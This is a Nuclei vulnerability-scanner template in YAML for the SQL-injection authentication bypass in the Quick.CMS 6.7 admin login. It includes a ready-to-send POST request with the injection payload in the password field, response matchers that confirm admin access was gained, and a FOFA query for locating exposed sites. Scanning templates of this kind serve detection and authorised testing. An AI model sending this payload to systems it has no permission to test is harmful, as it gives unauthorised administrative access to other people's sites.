nuclei-templates/http/vulnerabilities/other/quick-cms-sqli.yaml

42 lines
1.2 KiB
YAML

id: quick-cms-sqli
info:
name: Quick.CMS v6.7 - SQL Injection
author: Kazgangap
severity: high
description: |
Quick.CMS version 6.7 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
reference:
- https://packetstormsecurity.com/files/177657/Quick.CMS-6.7-SQL-Injection.html
- https://www.exploit-db.com/exploits/51910
metadata:
max-request: 1
verified: true
fofa-query: body="Quick.Cms v6.7"
tags: packetstorm,quickcms,sqli,cms
http:
- raw:
- |
POST /admin.php?p=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
sEmail=test%40test.net&sPass=%27+or+1%5D%2500&bAcceptLicense=1&iAcceptLicense=true
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Log out</a>"
- "Settings</a>"
- "Plugins</a>"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100e334653ae597ff1bd1cc87ee892f92fc7d955300ac91c5689d1c10a722cd8b4a022022ad5215230ff9c309d2c97066c3e492db92580033cf655c6826afc907ad00c9:922c64590222798bb761d5b6d8e72950